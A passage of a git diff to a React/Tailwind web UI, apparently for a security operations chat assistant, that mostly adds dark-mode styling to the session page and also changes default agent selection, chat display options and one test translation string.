+    () => agents.filter((a) => a.mode !== 'primary' && isAgentUsableInChat(a)),
     [agents],
   );
   const chatAgents = useMemo(() => [...primaryAgents, ...subAgents], [primaryAgents, subAgents]);
@@ -497,14 +497,13 @@ export default function SessionPage() {
       const newSessionId = response.data.id;
 
       addSession(response.data);
-      setSelectedAgent('rex');
       setSelectedModelKey(null);
       setSelectedSessionId(newSessionId);
 
       const payload: Record<string, unknown> = {
         parts: buildPromptParts(text, imageParts),
       };
-      const effectiveAgent = agentOverride || 'rex';
+      const effectiveAgent = agentOverride || selectedAgent || 'rex';
       if (effectiveAgent) payload.agent = effectiveAgent;
       if (modelOverride) payload.model = modelOverride;
       client.post(`/api/session/${newSessionId}/prompt_async`, payload).catch((err: any) => {
@@ -513,7 +512,7 @@ export default function SessionPage() {
     } catch (err: any) {
       toast.error(t('createFailed'), err.message);
     }
-  }, [addSession, toast, t]);
+  }, [addSession, selectedAgent, toast, t]);
 
   const showSelectorTooltip = useCallback((target: HTMLElement, title: string, lines: string[]) => {
     const rect = target.getBoundingClientRect();
@@ -693,10 +692,10 @@ export default function SessionPage() {
   }
 
   return (
-    <div className="h-full w-full flex overflow-hidden">
+    <div className="h-full w-full flex overflow-hidden bg-gray-50 dark:bg-zinc-950">
       {/* ── Sidebar ── */}
       <div
-        className={`bg-white border-r border-gray-100 flex flex-col transition-all duration-300 flex-shrink-0 h-full overflow-hidden ${
+        className={`bg-white border-r border-gray-100 flex flex-col transition-all duration-300 flex-shrink-0 h-full overflow-hidden dark:border-zinc-800 dark:bg-zinc-950 ${
           sidebarCollapsed ? 'w-0' : 'w-64'
         }`}
       >
@@ -709,7 +708,7 @@ export default function SessionPage() {
             <button
               onClick={handleCreateSession}
               disabled={creating}
-              className="w-full pl-8 pr-3 py-2 text-left bg-white border border-gray-200 text-gray-700 rounded-lg hover:bg-gray-50 hover:border-gray-300 shadow-sm hover:shadow transition-all disabled:opacity-60 disabled:cursor-not-allowed text-sm font-medium"
+              className="w-full pl-8 pr-3 py-2 text-left bg-white border border-gray-200 text-gray-700 rounded-lg hover:bg-gray-50 hover:border-gray-300 shadow-sm hover:shadow transition-all disabled:opacity-60 disabled:cursor-not-allowed text-sm font-medium dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-200 dark:hover:border-zinc-700 dark:hover:bg-zinc-800"
             >
               {t('newSession')}
             </button>
@@ -720,7 +719,7 @@ export default function SessionPage() {
               value={searchQuery}
               onChange={(e) => setSearchQuery(e.target.value)}
               placeholder={t('filterConversations', 'Filter conversations...')}
-              className="w-full pl-8 pr-3 py-1.5 text-sm bg-gray-100 rounded-lg border-0 outline-none focus:bg-gray-200 transition-colors placeholder:text-gray-400 text-gray-700"
+              className="w-full pl-8 pr-3 py-1.5 text-sm bg-gray-100 rounded-lg border-0 outline-none focus:bg-gray-200 transition-colors placeholder:text-gray-400 text-gray-700 dark:bg-zinc-900 dark:text-zinc-200 dark:placeholder:text-zinc-600 dark:focus:bg-zinc-800"
             />
           </div>
         </div>
@@ -748,7 +747,7 @@ export default function SessionPage() {
 
               return (
               <div key={key}>
-                <div className="px-4 pt-4 pb-1 text-xs font-semibold text-gray-400 uppercase tracking-wide select-none">
+                <div className="px-4 pt-4 pb-1 text-xs font-semibold text-gray-400 uppercase tracking-wide select-none dark:text-zinc-600">
                   {t(labelKey, labelKey)}
                 </div>
                 {visibleItems.map((session) => (
@@ -757,10 +756,10 @@ export default function SessionPage() {
                     onClick={() => selectMode ? handleToggleCheck(session.id) : setSelectedSessionId(session.id)}
                     className={`group relative mx-2 mb-1 px-3 py-2.5 rounded-xl border cursor-pointer transition-all duration-150 ${
                       !selectMode && selectedSessionId === session.id
-                        ? 'bg-gray-100 border-gray-300 shadow-sm'
+                        ? 'bg-gray-100 border-gray-300 shadow-sm dark:border-zinc-700 dark:bg-zinc-900 dark:shadow-none'
                         : selectMode && checkedIds.has(session.id)
-                        ? 'bg-blue-50 border-blue-200'
-                        : 'border-gray-100 hover:border-gray-200 hover:bg-gray-50 hover:shadow-sm'
+                        ? 'bg-blue-50 border-blue-200 dark:border-blue-500/40 dark:bg-blue-950/30'
+                        : 'border-gray-100 hover:border-gray-200 hover:bg-gray-50 hover:shadow-sm dark:border-transparent dark:hover:border-zinc-800 dark:hover:bg-zinc-900 dark:hover:shadow-none'
                     }`}
                   >
                     {/* Title row */}
@@ -797,12 +796,12 @@ export default function SessionPage() {
                           }}
                           placeholder={t('renamePlaceholder')}
                           disabled={renameSubmitting}
-                          className="w-full min-w-0 rounded border border-blue-300 bg-white px-1.5 py-0.5 text-sm text-gray-900 outline-none focus:border-blue-400"
+                          className="w-full min-w-0 rounded border border-blue-300 bg-white px-1.5 py-0.5 text-sm text-gray-900 outline-none focus:border-blue-400 dark:border-blue-500/50 dark:bg-zinc-950 dark:text-zinc-100"
                           aria-label={t('rename')}
                           data-session-rename-input
                         />
                       ) : (
-                        <h3 className="font-semibold text-gray-900 truncate text-sm flex items-center gap-1.5">
+                        <h3 className="font-semibold text-gray-900 truncate text-sm flex items-center gap-1.5 dark:text-zinc-100">
                           <span className="truncate">{session.title}</span>
                           {session.isShared && (
                             <span className="inline-flex items-center rounded-full border border-blue-200 bg-blue-50 px-1.5 py-0.5 text-[10px] font-medium text-blue-700">
@@ -814,7 +813,7 @@ export default function SessionPage() {
                     </div>
                     {/* Timestamp row */}
                     {session.time?.updated && renamingSessionId !== session.id && (
-                      <p className="mt-1 text-xs text-gray-400 truncate pl-0.5">
+                      <p className="mt-1 text-xs text-gray-400 truncate pl-0.5 dark:text-zinc-500">
                         {formatSessionDate(session.time.updated)}
                       </p>
                     )}
@@ -837,8 +836,8 @@ export default function SessionPage() {
                           title={t('moreActions')}
                           aria-label={t('moreActions')}
                           aria-expanded={openMenuSessionId === session.id}
-                          className={`p-1 rounded text-gray-400 hover:text-gray-600 hover:bg-gray-200 transition-all ${
-                            openMenuSessionId === session.id ? 'opacity-100 text-gray-600 bg-gray-200' : 'opacity-0 group-hover:opacity-100'
+                          className={`p-1 rounded text-gray-400 hover:text-gray-600 hover:bg-gray-200 transition-all dark:text-zinc-500 dark:hover:bg-zinc-800 dark:hover:text-zinc-200 ${
+                            openMenuSessionId === session.id ? 'opacity-100 text-gray-600 bg-gray-200 dark:bg-zinc-800 dark:text-zinc-200' : 'opacity-0 group-hover:opacity-100'
                           }`}
                         >
                           <MoreHorizontal className="w-3.5 h-3.5" />
@@ -874,7 +873,7 @@ export default function SessionPage() {
 
         {/* Bottom：批量操作栏 / 批量选择入口 */}
         {sessions.length > 0 && (
-          <div className="border-t border-gray-100 px-3 pt-3 pb-4 flex-shrink-0">
+          <div className="border-t border-gray-100 px-3 pt-3 pb-4 flex-shrink-0 dark:border-zinc-800">
             {selectMode ? (
               <div className="grid grid-cols-3 gap-1.5">
                 <button
@@ -914,11 +913,11 @@ export default function SessionPage() {
       {/* ── Main area ── */}
       <div className="flex-1 flex flex-col overflow-hidden h-full min-w-0">
         {/* Header */}
-        <div className="px-6 h-12 border-b border-gray-200 bg-white flex items-center justify-between flex-shrink-0 relative">
+        <div className="px-6 h-12 border-b border-gray-200 bg-white flex items-center justify-between flex-shrink-0 relative dark:border-zinc-800 dark:bg-zinc-950/95">
           <div className="absolute left-4 top-1/2 -translate-y-1/2">
             <button
               onClick={() => setSidebarCollapsed(!sidebarCollapsed)}
-              className="p-2 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 shadow-sm hover:shadow-md transition-all duration-200"
+              className="p-2 bg-white border border-gray-300 rounded-lg hover:bg-gray-50 shadow-sm hover:shadow-md transition-all duration-200 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:shadow-none"
               title={sidebarCollapsed ? t('showHistory') : t('hideHistory')}
             >
               {sidebarCollapsed ? <PanelLeft className="w-5 h-5" /> : <PanelLeftClose className="w-5 h-5" />}
@@ -926,7 +925,7 @@ export default function SessionPage() {
           </div>
 
           <div className="flex items-center gap-3 ml-14">
-            <h2 className="text-base font-semibold text-gray-900">
+            <h2 className="text-base font-semibold text-gray-900 dark:text-zinc-100">
               {selectedSession?.title || t('newSession')}
             </h2>
           </div>
@@ -939,7 +938,13 @@ export default function SessionPage() {
           sessionId={selectedSessionId}
           live={Boolean(selectedSessionId)}
           hideInput={selectedSession?.canWrite === false}
-          display={{ compact: false, showActions: true, showTimestamp: true }}
+          display={{
+            compact: false,
+            showActions: true,
+            showTimestamp: true,
+            collapseIntermediateSteps: true,
+            processGroupsDefaultOpen: true,
+          }}
           agentName={selectedAgent}
           mentionAgents={chatAgents}
           className="flex-1 min-h-0"
@@ -962,7 +967,7 @@ export default function SessionPage() {
               <button
                 type="button"
                 onClick={() => setShowAgentOptions(!showAgentOptions)}
-                className="flex h-7 w-auto max-w-[150px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900"
+                className="flex h-7 w-auto max-w-[150px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                 title={t('agentPicker.title')}
               >
                 <Bot className="h-3 w-3 shrink-0" />
@@ -972,12 +977,12 @@ export default function SessionPage() {
                 <ChevronDown className={`h-3 w-3 shrink-0 transition-transform ${showAgentOptions ? 'rotate-180' : ''}`} />
               </button>
               {showAgentOptions && (
-                <div className="absolute left-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm">
-                  <div className="flex items-center justify-between gap-2 border-b border-zinc-100 px-2.5 py-1.5">
+                <div className="absolute left-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+                  <div className="flex items-center justify-between gap-2 border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
                     <div className="min-w-0">
-                      <div className="text-xs font-semibold text-zinc-700">{t('agentPicker.title')}</div>
+                      <div className="text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('agentPicker.title')}</div>
                       <div
-                        className="truncate text-[10px] text-zinc-400"
+                        className="truncate text-[10px] text-zinc-400 dark:text-zinc-500"
                         onPointerEnter={(event) => showSelectorTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
                         onMouseEnter={(event) => showSelectorTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
                         onMouseOver={(event) => showSelectorTooltip(event.currentTarget, t('agentPicker.title'), [t('agentPicker.hint')])}
@@ -987,7 +992,7 @@ export default function SessionPage() {
                         {t('agentPicker.hint')}
                       </div>
                     </div>
-                    <div className="inline-flex shrink-0 items-center rounded-md border border-zinc-200 bg-white p-0.5 text-[10px]">
+                    <div className="inline-flex shrink-0 items-center rounded-md border border-zinc-200 bg-white p-0.5 text-[10px] dark:border-zinc-800 dark:bg-zinc-950">
                       {(['all', 'builtin', 'custom'] as AgentSourceFilter[]).map((filter) => (
                         <button
                           key={filter}
@@ -995,8 +1000,8 @@ export default function SessionPage() {
                           onClick={() => setAgentSourceFilter(filter)}
                           className={`rounded px-1.5 py-0.5 transition-colors ${
                             agentSourceFilter === filter
-                              ? 'bg-zinc-100 text-zinc-900'
-                              : 'text-zinc-500 hover:bg-zinc-50 hover:text-zinc-800'
+                              ? 'bg-zinc-100 text-zinc-900 dark:bg-zinc-800 dark:text-zinc-50'
+                              : 'text-zinc-500 hover:bg-zinc-50 hover:text-zinc-800 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100'
                           }`}
                         >
                           {t(`agentPicker.filter.${filter}`)}
@@ -1017,21 +1022,21 @@ export default function SessionPage() {
                           onClick={() => { setSelectedAgent(agent.name); setShowAgentOptions(false); }}
                           className={`w-full min-w-0 rounded-md px-2 py-1.5 text-left transition-colors ${
                             selectedAgent === agent.name
-                              ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa]'
-                              : 'hover:bg-zinc-50 text-zinc-700'
+                              ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa] dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-[inset_2px_0_0_#539bf5]'
+                              : 'hover:bg-zinc-50 text-zinc-700 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50'
                           }`}
                         >
                           <div className="flex min-w-0 items-center gap-2">
-                            <Bot className={`h-3 w-3 shrink-0 ${selectedAgent === agent.name ? 'text-zinc-600' : 'text-zinc-400'}`} />
-                            <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900">
+                            <Bot className={`h-3 w-3 shrink-0 ${selectedAgent === agent.name ? 'text-zinc-600 dark:text-zinc-200' : 'text-zinc-400 dark:text-zinc-500'}`} />
+                            <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900 dark:text-zinc-100">
                               {displayName}
                             </span>
                             <span className={`shrink-0 rounded px-1.5 py-0.5 text-[9px] font-medium ${
                               agent.mode === 'primary'
-                                ? 'bg-zinc-100 text-zinc-600'
+                                ? 'bg-zinc-100 text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300'
                                 : agent.native
-                                  ? 'bg-zinc-100 text-zinc-600'
-                                  : 'bg-teal-50 text-teal-600'
+                                  ? 'bg-zinc-100 text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300'
+                                  : 'bg-teal-50 text-teal-600 dark:bg-teal-950/40 dark:text-teal-300'
                             }`}>
                               {agent.mode === 'primary'
                                 ? t('agentPicker.badge.primary')
@@ -1042,7 +1047,7 @@ export default function SessionPage() {
                             <div className="ml-auto flex shrink-0 items-center gap-1">
                               {primaryDesc && (
                                 <span
-                                  className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200"
+                                  className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200 dark:hover:bg-zinc-700"
                                   onMouseDown={(event) => { event.preventDefault(); event.stopPropagation(); }}
                                   onClick={(event) => { event.preventDefault(); event.stopPropagation(); }}
                                   onPointerEnter={(event) => showSelectorTooltip(event.currentTarget, displayName, [primaryDesc])}
@@ -1051,7 +1056,7 @@ export default function SessionPage() {
                                   onMouseLeave={() => setSelectorTooltip(null)}
                                   onPointerLeave={() => setSelectorTooltip(null)}
                                 >
-                                  <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500" />
+                                  <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500 dark:text-zinc-600 dark:group-hover:text-zinc-300" />
                                 </span>
                               )}
                             </div>
@@ -1073,7 +1078,7 @@ export default function SessionPage() {
                 type="button"
                 onClick={() => setShowModelOptions(!showModelOptions)}
                 disabled={loadingProviders || loadingEnabledModels || chatModelOptions.length === 0}
-                className="flex h-7 w-[132px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 disabled:cursor-not-allowed disabled:opacity-50"
+                className="flex h-7 w-[132px] min-w-0 items-center gap-1.5 rounded-lg px-2 text-xs text-zinc-600 transition-colors hover:bg-zinc-200/60 hover:text-zinc-900 disabled:cursor-not-allowed disabled:opacity-50 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                 title={selectedModelOption ? `${selectedModelOption.providerName} / ${selectedModelOption.modelID}` : t('modelPicker.empty')}
               >
                 <Cpu className="h-3 w-3 shrink-0" />
@@ -1083,10 +1088,10 @@ export default function SessionPage() {
                 <ChevronDown className={`h-3 w-3 shrink-0 transition-transform ${showModelOptions ? 'rotate-180' : ''}`} />
               </button>
               {showModelOptions && (
-                <div className="absolute left-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm">
-                  <div className="border-b border-zinc-100 px-2.5 py-1.5">
-                    <div className="text-xs font-semibold text-zinc-700">{t('modelPicker.title')}</div>
-                    <div className="truncate text-[10px] text-zinc-400">{t('modelPicker.hint')}</div>
+                <div className="absolute right-0 bottom-full z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:shadow-xl dark:shadow-black/30">
+                  <div className="border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
+                    <div className="text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('modelPicker.title')}</div>
+                    <div className="truncate text-[10px] text-zinc-400 dark:text-zinc-500">{t('modelPicker.hint')}</div>
                   </div>
                   <div className="h-[13.5rem] overflow-y-auto p-1.5">
                     {loadingProviders || loadingEnabledModels ? (
@@ -1094,9 +1099,9 @@ export default function SessionPage() {
                     ) : groupedChatModelOptions.length > 0 ? (
                       groupedChatModelOptions.map((group) => (
                         <div key={group.providerID} className="py-1 first:pt-0 last:pb-0">
-                          <div className="sticky top-0 z-10 flex items-center justify-between gap-2 bg-white/95 px-1.5 py-1 text-[10px] font-semibold text-zinc-500 backdrop-blur">
+                          <div className="sticky top-0 z-10 flex items-center justify-between gap-2 bg-white/95 px-1.5 py-1 text-[10px] font-semibold text-zinc-500 backdrop-blur dark:bg-zinc-900/95 dark:text-zinc-400">
                             <span className="truncate">{group.providerName}</span>
-                            <span className="shrink-0 rounded bg-zinc-50 px-1.5 py-0.5 text-[9px] text-zinc-500">
+                            <span className="shrink-0 rounded bg-zinc-50 px-1.5 py-0.5 text-[9px] text-zinc-500 dark:bg-zinc-800 dark:text-zinc-400">
                               {t('modelPicker.count', { count: group.models.length })}
                             </span>
                           </div>
@@ -1108,21 +1113,21 @@ export default function SessionPage() {
                                 onClick={() => void handleSelectModel(option)}
                                 className={`w-full rounded-md px-2 py-1.5 text-left transition-colors ${
                                   selectedModelOption?.key === option.key
-                                    ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa]'
-                                    : 'text-zinc-700 hover:bg-zinc-50'
+                                    ? 'bg-zinc-50 text-zinc-900 shadow-[inset_2px_0_0_#a1a1aa] dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-[inset_2px_0_0_#539bf5]'
+                                    : 'text-zinc-700 hover:bg-zinc-50 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50'
                                 }`}
                               >
                                 <div className="flex min-w-0 items-center gap-2">
-                                  <Cpu className={`h-3 w-3 shrink-0 ${selectedModelOption?.key === option.key ? 'text-zinc-600' : 'text-zinc-400'}`} />
-                                  <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900">{option.label}</span>
+                                  <Cpu className={`h-3 w-3 shrink-0 ${selectedModelOption?.key === option.key ? 'text-zinc-600 dark:text-zinc-200' : 'text-zinc-400 dark:text-zinc-500'}`} />
+                                  <span className="min-w-0 flex-1 truncate text-xs font-medium text-zinc-900 dark:text-zinc-100">{option.label}</span>
                                   {option.supportsVision === true && (
-                                    <span className="shrink-0 rounded bg-zinc-100 px-1.5 py-0.5 text-[9px] font-medium text-zinc-600">
+                                    <span className="shrink-0 rounded bg-zinc-100 px-1.5 py-0.5 text-[9px] font-medium text-zinc-600 dark:bg-zinc-800 dark:text-zinc-300">
                                       {t('modelPicker.vision')}
                                     </span>
                                   )}
                                   <div className="ml-auto flex shrink-0 items-center gap-1">
                                     <span
-                                      className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200"
+                                      className="group relative rounded p-0.5 transition-colors hover:bg-zinc-200 dark:hover:bg-zinc-700"
                                       onMouseDown={(event) => { event.preventDefault(); event.stopPropagation(); }}
                                       onClick={(event) => { event.preventDefault(); event.stopPropagation(); }}
                                       onPointerEnter={(event) => showSelectorTooltip(event.currentTarget, option.label, [option.pricingLabel, option.contextLabel])}
@@ -1131,7 +1136,7 @@ export default function SessionPage() {
                                       onMouseLeave={() => setSelectorTooltip(null)}
                                       onPointerLeave={() => setSelectorTooltip(null)}
                                     >
-                                      <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500" />
+                                      <Info className="h-3 w-3 text-zinc-300 transition-colors group-hover:text-zinc-500 dark:text-zinc-600 dark:group-hover:text-zinc-300" />
                                     </span>
                                   </div>
                                 </div>
@@ -1144,7 +1149,7 @@ export default function SessionPage() {
                       <div className="p-3 text-center text-xs text-zinc-500">{t('modelPicker.empty')}</div>
                     )}
                   </div>
-                  <div className="border-t border-zinc-100 p-1.5">
+                  <div className="border-t border-zinc-100 p-1.5 dark:border-zinc-800">
                     <button
                       type="button"
                       onClick={() => {
@@ -1152,7 +1157,7 @@ export default function SessionPage() {
                         setSelectorTooltip(null);
                         navigate('/models');
                       }}
-                      className="flex w-full items-center justify-center gap-1.5 rounded-md px-2 py-1.5 text-xs font-medium text-zinc-600 transition-colors hover:bg-zinc-50 hover:text-zinc-900"
+                      className="flex w-full items-center justify-center gap-1.5 rounded-md px-2 py-1.5 text-xs font-medium text-zinc-600 transition-colors hover:bg-zinc-50 hover:text-zinc-900 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50"
                     >
                       <Plus className="h-3 w-3" />
                       {t('modelPicker.addModel')}
@@ -1167,16 +1172,16 @@ export default function SessionPage() {
 
       {selectorTooltip && (
         <div
-          className="pointer-events-none fixed z-[80] w-56 -translate-x-full -translate-y-1/2 rounded-lg border border-zinc-200 bg-white px-3 py-2 text-[11px] leading-relaxed text-zinc-700 shadow-md"
+          className="pointer-events-none fixed z-[80] w-56 -translate-x-full -translate-y-1/2 rounded-lg border border-zinc-200 bg-white px-3 py-2 text-[11px] leading-relaxed text-zinc-700 shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-300 dark:shadow-xl dark:shadow-black/30"
           style={{ left: selectorTooltip.x, top: selectorTooltip.y }}
         >
-          <div className="mb-0.5 font-semibold text-zinc-800">{selectorTooltip.title}</div>
+          <div className="mb-0.5 font-semibold text-zinc-800 dark:text-zinc-100">{selectorTooltip.title}</div>
           {selectorTooltip.lines.map((line, index) => (
-            <div key={`${selectorTooltip.title}-${index}`} className={index === 0 ? '' : 'mt-1 break-all text-zinc-500'}>
+            <div key={`${selectorTooltip.title}-${index}`} className={index === 0 ? '' : 'mt-1 break-all text-zinc-500 dark:text-zinc-400'}>
               {line}
             </div>
           ))}
-          <div className="absolute left-full top-1/2 -translate-y-1/2 border-4 border-transparent border-l-zinc-200" />
+          <div className="absolute left-full top-1/2 -translate-y-1/2 border-4 border-transparent border-l-zinc-200 dark:border-l-zinc-800" />
         </div>
       )}
 
@@ -1187,14 +1192,14 @@ export default function SessionPage() {
         if (!session) return null;
         return (
           <div
-            className="fixed z-50 w-36 overflow-hidden rounded-lg border border-gray-200 bg-white py-1 shadow-lg"
+            className="fixed z-50 w-36 overflow-hidden rounded-lg border border-gray-200 bg-white py-1 shadow-lg dark:border-zinc-800 dark:bg-zinc-900"
             style={{ top: menuAnchor.top, right: menuAnchor.right }}
             data-session-menu-portal
             onClick={(e) => e.stopPropagation()}
           >
             <button
               onClick={(e) => { e.stopPropagation(); handleStartRename(session.id, session.title); setOpenMenuSessionId(null); setMenuAnchor(null); }}
-              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors"
+              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors dark:text-zinc-200 dark:hover:bg-zinc-800"
             >
               <PencilLine className="w-3.5 h-3.5" />
               <span>{t('rename')}</span>
@@ -1202,7 +1207,7 @@ export default function SessionPage() {
             <button
               onClick={(e) => { e.stopPropagation(); void handleDownloadSession(session.id, session.title); setOpenMenuSessionId(null); setMenuAnchor(null); }}
               disabled={downloadingSessionId === session.id}
-              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50"
+              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50 dark:text-zinc-200 dark:hover:bg-zinc-800"
             >
               <Download className="w-3.5 h-3.5" />
               <span>{t('downloadJson')}</span>
@@ -1210,16 +1215,16 @@ export default function SessionPage() {
             <button
               onClick={(e) => { e.stopPropagation(); setOpenMenuSessionId(null); setMenuAnchor(null); void handleShareSession(session.id, !session.isShared); }}
               disabled={session.canWrite === false}
-              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50"
+              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-gray-700 hover:bg-gray-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50 dark:text-zinc-200 dark:hover:bg-zinc-800"
             >
               <Share2 className="w-3.5 h-3.5" />
               <span>{session.isShared ? t('unshareAction') : t('shareAction')}</span>
             </button>
-            <div className="mx-2.5 my-1 border-t border-gray-100" />
+            <div className="mx-2.5 my-1 border-t border-gray-100 dark:border-zinc-800" />
             <button
               onClick={(e) => { e.stopPropagation(); setOpenMenuSessionId(null); setMenuAnchor(null); void handleDeleteSession(session.id); }}
               disabled={session.canDelete === false}
-              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-red-600 hover:bg-red-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50"
+              className="flex w-full items-center gap-2 px-2.5 py-1.5 text-left text-sm text-red-600 hover:bg-red-50 transition-colors disabled:cursor-not-allowed disabled:opacity-50 dark:text-red-300 dark:hover:bg-red-950/40"
             >
               <Trash2 className="w-3.5 h-3.5" />
               <span>{t('deleteAction')}</span>
@@ -1240,30 +1245,30 @@ function WelcomeScreen({ onSuggestion }: { onSuggestion: (text: string) => void
       <div className="w-20 h-20 mx-auto mb-6 rounded-full bg-gradient-to-br from-slate-700 to-slate-900 flex items-center justify-center shadow-lg">
         <Sparkles className="w-10 h-10 text-white" />
       </div>
-      <h3 className="text-xl font-bold text-gray-900 mb-3">{t('welcome.title')}</h3>
-      <p className="text-sm text-gray-600 mb-8">{t('welcome.description')}</p>
+      <h3 className="text-xl font-bold text-gray-900 mb-3 dark:text-zinc-50">{t('welcome.title')}</h3>
+      <p className="text-sm text-gray-600 mb-8 dark:text-zinc-400">{t('welcome.description')}</p>
 
       <div className="flex flex-wrap gap-3 justify-center">
         <button
           onClick={() => onSuggestion(t('welcome.alertTriageSuggestion'))}
-          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-slate-400 hover:bg-slate-50 transition-all duration-200 shadow-sm hover:shadow-md"
+          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-slate-400 hover:bg-slate-50 transition-all duration-200 shadow-sm hover:shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:hover:border-slate-500/70 dark:hover:bg-zinc-800 dark:hover:shadow-none"
         >
           <Shield className="w-5 h-5 text-slate-600" />
-          <span className="font-medium text-gray-700">{t('welcome.alertTriage')}</span>
+          <span className="font-medium text-gray-700 dark:text-zinc-200">{t('welcome.alertTriage')}</span>
         </button>
         <button
           onClick={() => onSuggestion(t('welcome.threatHuntingSuggestion'))}
-          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-orange-400 hover:bg-orange-50 transition-all duration-200 shadow-sm hover:shadow-md"
+          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-orange-400 hover:bg-orange-50 transition-all duration-200 shadow-sm hover:shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:hover:border-orange-500/70 dark:hover:bg-orange-950/30 dark:hover:shadow-none"
         >
           <Search className="w-5 h-5 text-orange-600" />
-          <span className="font-medium text-gray-700">{t('welcome.threatHunting')}</span>
+          <span className="font-medium text-gray-700 dark:text-zinc-200">{t('welcome.threatHunting')}</span>
         </button>
         <button
           onClick={() => onSuggestion(t('welcome.incidentResponseSuggestion'))}
-          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-amber-400 hover:bg-amber-50 transition-all duration-200 shadow-sm hover:shadow-md"
+          className="flex items-center gap-2 px-5 py-3 bg-white border-2 border-gray-200 rounded-xl hover:border-amber-400 hover:bg-amber-50 transition-all duration-200 shadow-sm hover:shadow-md dark:border-zinc-800 dark:bg-zinc-900 dark:hover:border-amber-500/70 dark:hover:bg-amber-950/30 dark:hover:shadow-none"
         >
           <AlertTriangle className="w-5 h-5 text-amber-600" />
-          <span className="font-medium text-gray-700">{t('welcome.incidentResponse')}</span>
+          <span className="font-medium text-gray-700 dark:text-zinc-200">{t('welcome.incidentResponse')}</span>
         </button>
       </div>
     </div>
diff --git a/webui/src/pages/Skill/SkillSheet.test.tsx b/webui/src/pages/Skill/SkillSheet.test.tsx
index 556837967..505a9f5be 100644
--- a/webui/src/pages/Skill/SkillSheet.test.tsx
+++ b/webui/src/pages/Skill/SkillSheet.test.tsx
@@ -53,7 +53,7 @@ const entityTranslations: Record<string, string> = {
   'entity.defaultCreate': '创建',
   'entity.defaultSave': '保存',
   'entity.tabDetails': '详情',
-  'entity.tabAIEdit': 'AI 编辑',
+  'entity.tabAIEdit': '工作台',
   'entity.tabTest': '测试',
   'entity.cancelButton': '取消',
   'entity.testButton': '测试',
@@ -115,7 +115,7 @@ describe('SkillSheet', () => {
 
     it('should default to Rex tab in create mode', () => {
       render(<SkillSheet {...defaultProps} />);
